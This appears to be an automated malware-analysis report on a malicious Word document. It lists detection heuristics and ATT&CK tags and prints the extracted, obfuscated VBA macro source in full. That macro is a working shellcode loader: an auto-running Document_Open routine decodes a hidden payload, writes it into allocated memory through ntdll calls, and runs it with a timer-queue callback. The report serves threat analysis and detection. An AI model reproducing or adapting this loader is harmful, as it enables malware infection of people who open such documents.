MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV heuristic identified the file as a downloader macro. The presence of VBA macros, specifically a Document_Open macro, indicates an attempt to execute malicious code upon opening. The macro's obfuscated nature and truncated script prevent a detailed analysis of its specific actions, but its purpose is clearly to download and execute a secondary payload.
Heuristics 4
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_Open() Dim collard As Long -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11580 bytes |
SHA-256: 929956f8f515287af55407e2f9d93451652b93959ab90f871f6584102e32a5f2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function predicator()
Dim gre As Variant
Dim yoyo As Variant
proclaimed.elzevir.Value = Day(#12/5/2013#)
Set atlantic = proclaimed.elzevir.SelectedItem
denture = 33 + 58
Pmt 0, denture, 37465, 59418, 5
announcement = atlantic.Name
sway = 10 - 57 + 7891
wesleyan = Right(announcement, sway)
downandout = hugeness(wesleyan)
kat = 4 + 43
Pmt 0, kat, 6725, 51329, 4
#If (92 - 76 + 384 + 16 - 97 + 381) > ((88 - 15 + 247) - (43 - 99 + 596) * 1) And ((121 - 78 - 15) - (45 - 7 - 10)) * 2 < (Win64) Then
Dim clitoris As LongPtr
Dim collard As LongPtr
Dim ostyak As LongPtr
Dim araucariaceae As LongPtr
Dim hirudinea As LongPtr
cimicidae = 38 - 66 + 2092
#End If
#If (123 - 68 + 345 + 15 - 62 + 347) > ((63 - 106 + 363) - (81 - 13 + 472) * 1) And Not ((9 - 113 + 132) - (31 - 75 + 72)) * 2 < (Win64) Then
Dim collard As Long
Dim clitoris As Long
Dim ostyak As Long
enabling = 51 - 60 + 790
Dim araucariaceae As Long
Dim hirudinea As Long
cimicidae = enabling + 3459
#End If
mad = 60 - 64 + 4
tenpenny = "pallone"
apoapsis = 80 - 31 + 4047
mandara = 7 + 25
Pmt 0, mandara, 30363, 51675, 3
mumbling = "aitch"
calcitration = "unrecognizable"
stevedore = "clash"
extract = cerapteryx
palace = 20 + 56
Pmt 0, palace, 11286, 42318, 8
refrigerate = downandout
saggittary = "maclura"
pluckily = mascot
clitoris = inpatient(refrigerate)
biosystematics = "eubacteria"
Dim down As Long
Dim achimenes As Long
ostyak = 4 - 26 + 22
collard = clitoris + cimicidae
araucariaceae = 55 - 2 + 201474
hirudinea = 52 - 31 + 3479
flash = lurch(araucariaceae, ostyak, _
collard, ostyak, _
ostyak, ostyak, _
ostyak)
buttony = 41 + 58
Pmt 0, buttony, 12018, 30718, 5
End Function
Private Sub Document_Open()
Dim collard As Long
Dim clitoris As Long
Dim ostyak As Long
enabling = 51 - 60 + 790
Dim araucariaceae As Long
Dim hirudinea As Long
cimicidae = enabling + 3459
predicator
coolness = 56 + 47
Pmt 0, coolness, 17173, 34171, 6
End Sub
Attribute VB_Name = "proclaimed"
Attribute VB_Base = "0{6FC50B9F-5586-4D18-855B-91374C093575}{B6FA8E3B-3FF4-46E2-9AD6-EF01FC39883D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
#If (16 - 123 + 507 + 41 - 72 + 331) > ((24 - 78 + 374) - (58 - 116 + 598) * 1) And Not ((56 - 49 + 21) - (71 - 107 + 64)) * 2 < (Win64) Then
Public Declare Function morbosity _
Lib "Ntdll " Alias _
"NtAllocateVirtualMemory" (shortbreathed As Long, revokement As Long, ByVal served As Long, aceraceaeByVal As Long, anthropogenetic As Long, ByVal attache As Long) As Long
#End If
#If (14 - 113 + 499 + 103 - 53 + 250) > ((88 - 17 + 249) - (65 - 44 + 519) * 1) And ((11 - 6 + 23) - (99 - 21 - 50)) * 2 < (Win64) Then
Public Declare PtrSafe Function morbosity _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (anuresis As LongPtr, marvelous As LongPtr, ByVal damselfish As LongPtr, aggravatinglyByVal As LongPtr, methacholine As LongPtr, ByVal between As LongPtr) As LongPtr
#End If
Function fustigation()
Dim chameleon(255) As Byte
biteplate = 13 - 95 + 147
For i = biteplate To (48 - 47 + 90)
chameleon(biteplate) = biteplate - (111 - 118 + 72)
biteplate = biteplate + 1
If (126 - 83 + 48) < biteplate Then
calcimine = hassle + 118 - 44 - 9
Exit For
End If
lavishment = chilling + 48 - 103 + 120
Next
biteplate = (7 - 85 + 126)
For i = biteplate To (18 - 68 + 108)
chameleon(biteplate) = biteplate + (65 - 4 - 57)
biteplate = biteplate + 1
If (84 - 18 - 8) < biteplate Then
perlustration = nightingale + 62 - 34 + 37
Exit For
End If
alcelaphus = azotemic + 90 - 106 + 81
Next
biteplate = (107 - 50 + 40)
For i = biteplate To (17 - 48 + 154)
chameleon(biteplate) = biteplate - (101 - 28 - 2)
biteplate = biteplate + 1
quidnunc = polysyllable + 75 - 57 + 47
If (43 - 11 + 91) < biteplate Then
dreamed = meandrous + 60 - 28 + 33
Exit For
End If
paleornithology = ceryle + 22 - 17 + 60
Next
chameleon(34 - 99 + 112) = (14 - 109 + 158)
biteplate = (76 - 124 + 91)
chameleon(biteplate) = (20 - 58 + 100)
fustigation = chameleon
End Function
Attribute VB_Name = "Module2"
#If (16 - 123 + 507 + 41 - 72 + 331) > ((24 - 78 + 374) - (58 - 116 + 598) * 1) And Not ((56 - 49 + 21) - (71 - 107 + 64)) * 2 < (Win64) Then
Public Declare Function lurch _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (gable As Any, ByVal blighty As Any, ByVal counteous As Any, ByVal andreaea As Any, ByVal crossjack As Any, ByVal brushed As Any, ByVal boston As Any) As Long
#End If
#If (16 - 123 + 507 + 41 - 72 + 331) > ((24 - 78 + 374) - (58 - 116 + 598) * 1) And Not ((56 - 49 + 21) - (71 - 107 + 64)) * 2 < (Win64) Then
Public Declare Function christmasberry _
Lib "Ntdll " Alias _
"NtWriteVirtualMemory" (ByVal serratus As Any, ByVal hinny As Any, ByVal cirrocumulus As Any, ByVal diggings As Any, ByVal multistory As Any) As Long
#End If
#If (14 - 113 + 499 + 103 - 53 + 250) > ((88 - 17 + 249) - (65 - 44 + 519) * 1) And ((11 - 6 + 23) - (99 - 21 - 50)) * 2 < (Win64) Then
Public Declare PtrSafe Function lurch _
Lib "Kernel32 " Alias _
"CreateTimerQueueTimer" (benefit As Any, ByVal caroling As Any, ByVal ceratostomella As Any, ByVal excursiion As Any, ByVal halftrack As Any, ByVal fane As Any, ByVal imperiousness As Any) As Long
#End If
Function evict(chromatrope, payoff, populated)
Dim cankered As Variant
Dim ranking As Integer
Dim publico As LongPtr
Dim disconfirming As LongPtr
Dim chausse As LongPtr
Dim caligation As String
Dim accouplement As LongPtr
Dim cromwellian As LongPtr
disconfirming = chromatrope
cromwellian = populated
accouplement = payoff
halfmast = 54 + 20
Pmt 0, halfmast, 6659, 37783, 8
publico = 93 - 88 - 6
focuses = christmasberry(ByVal publico, _
disconfirming, _
accouplement, cromwellian, _
chausse)
ndjamena = Math.Round(142)
End Function
Function hugeness(lactation) As String
Dim ibi(63) As Long
Dim bicolor() As Byte
Dim disbelieve(6962) As Byte
Dim brininess As Long
Dim echinocactus As Integer
Dim ballpoint As String
Dim agastache(63) As Long
Dim chelonia As Long
Dim accompany(63) As Long
Dim tartaran As Long
Dim bended As Long
archiannelid = 102 - 28 + 257974
aircrewman = 62 - 36 + 4070
Dim commendable As Integer
peon = 98 - 104 + 261
champ = 40 - 60 + 4052
carved = 83 - 36 + 262097
ophiurida = 4 - 18 + 270
brutal = 26 - 125 + 65379
Dim moiety As Variant
phyllodoce = 118 - 44 + 16711606
circumcise = 22 - 8 + 50
falciform = 54 - 23 + 65505
highfaluting = 121 - 125 + 67
Dim outbasket As String
mediated = 2 - 25 + 16515095
Dim neologist As String
wisplike = 48 - 88 + 7883
Dim bereaved() As Byte
bereaved = VBA.StrConv(lactation, 120 + 8)
afterimage = 53 + 44
Pmt 0, afterimage, 28655, 42242, 3
circumvolution = 7843
leanto = vbKeyShift - 12
For continence = 0 To circumvolution
If continence Mod 2 = 0 Then
bereaved(continence) = bereaved(continence) - leanto
Else
bereaved(continence) = bereaved(continence) - (leanto - 1)
End If
Next continence
baseforming = 39 + 19
Pmt 0, baseforming, 32447, 48259, 3
echinocactus = 0
meloidae = fustigation
For tartaran = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
accompany(tartaran) = applicability(tartaran, circumcise, 52)
agastache(tartaran) = applicability(tartaran, aircrewman, 52)
ibi(tartaran) = applicability(tartaran, carved, 52)
Next tartaran
yare = 24 + 48
Pmt 0, yare, 5431, 42282, 4
bicolor = bereaved
pendulum = 38 - 53 + 19
begrimed = 2 + 43
Pmt 0, begrimed, 7864, 10398, 3
illsorted = 29 - 106 + 80
similarity = Rnd(464)
similarity = Math.Round(214)
misplacement = illsorted + 1
allfired = 31 - 32 + 3
For brininess = 0 To circumvolution
desired = bicolor(brininess)
wincing = bicolor(brininess + 2)
abaft = agastache(meloidae(bicolor(brininess + 1)))
vassalage = accompany(meloidae(wincing)) + meloidae(bicolor(brininess + illsorted))
bended = ibi(meloidae(desired)) + abaft + vassalage
tartaran = applicability(bended, phyllodoce, 44)
disbelieve(chelonia) = applicability(tartaran, falciform, 34)
tartaran = applicability(bended, brutal, 44)
disbelieve(chelonia + 1) = applicability(tartaran, ophiurida, 34)
disbelieve(chelonia + allfired) = applicability(bended, peon, 44)
chelonia = chelonia + allfired + 1
brininess = brininess + 3
Next
hugeness = disbelieve
End Function
Function inpatient(counterpoison)
#If (25 - 28 + 403 + 92 - 30 + 238) > ((125 - 43 + 238) - (41 - 50 + 549) * 1) And ((67 - 126 + 87) - (30 - 37 + 35)) * 2 < (Win64) Then
Dim minibike As LongPtr
apiarist = 88 - 6 - 74
Dim carunculate As LongPtr
Dim devaluation As LongPtr
Dim inelegant As Long
articulate = VarPtr(minibike)
jamaican = evict(articulate, _
VarPtr(counterpoison) + (49 - 75 + 34), _
apiarist)
#End If
#If (9 - 20 + 411 + 3 - 108 + 405) > ((38 - 2 + 284) - (115 - 108 + 533) * 1) And Not ((24 - 36 + 40) - (1 - 21 + 48)) * 2 < (Win64) Then
Dim minibike As Long
apiarist = 72 - 56 - 12
Dim carunculate As Long
Dim devaluation As Long
articulate = VarPtr(minibike)
jamaican = compensating(articulate, _
VarPtr(counterpoison) + (14 - 58 + 52), _
apiarist)
#End If
emulsifier = 2 - 73 + 70
carunculate = 64 - 123 + 59
gossip = 75 - 26 - 49
devaluation = 115 - 35 + 9525
amerge = 120 - 27 + 4003
astrophysics = 118 - 83 + 29
meanie = morbosity(ByVal emulsifier, _
carunculate, ByVal gossip, _
devaluation, ByVal amerge, _
ByVal astrophysics)
similarity = nul * 1
ndjamena = similarity And 134
unlively = compensating(carunculate, _
minibike, 20 - 46 + 5909)
considerately = 52 + 18
Pmt 0, considerately, 27693, 51449, 7
inpatient = carunculate * 1
considerately = 52 + 18
End Function
Attribute VB_Name = "Module3"
#If (14 - 113 + 499 + 103 - 53 + 250) > ((88 - 17 + 249) - (65 - 44 + 519) * 1) And ((11 - 6 + 23) - (99 - 21 - 50)) * 2 < (Win64) Then
Public Declare PtrSafe Function christmasberry _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal cat As Any, ByVal crosssentential As Any, ByVal monochord As Any, ByVal cloyingly As Any, ByVal marlin As Any) As LongPtr
#End If
Function compensating(wryneck, albuminous, hilarious)
Dim numerose As Long
Dim maryland As Integer
Dim falconer As Long
Dim emaciation As Byte
Dim afflatus As Long
Dim terrene As Integer
Dim pancreatitis As Long
Dim contralto As Variant
Dim assegai As Long
Dim things As Integer
Dim undistracted As Long
ndjamena = nul / 315
blatter = "begrime"
numerose = wryneck
assegai = hilarious
blatter = blatter
afflatus = albuminous
sunscreen = 9 + 37
Pmt 0, sunscreen, 8768, 26249, 4
prolation = "inlaw"
falconer = 1 - 65 + 63
fixoid = christmasberry(ByVal falconer, _
numerose, afflatus, _
assegai, _
pancreatitis)
prolation = "acerb"
End Function
Function applicability(postoperatively, dejection, micromyx)
If micromyx = 34 + (10 / 2 - 5) Then
applicability = postoperatively \ dejection
ElseIf micromyx = 44 + (5 - 3) / 2 - 1 Then
applicability = postoperatively And dejection
ElseIf micromyx = 52 + (56 / 7 - 4 * 2) Then
applicability = postoperatively * dejection
End If
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.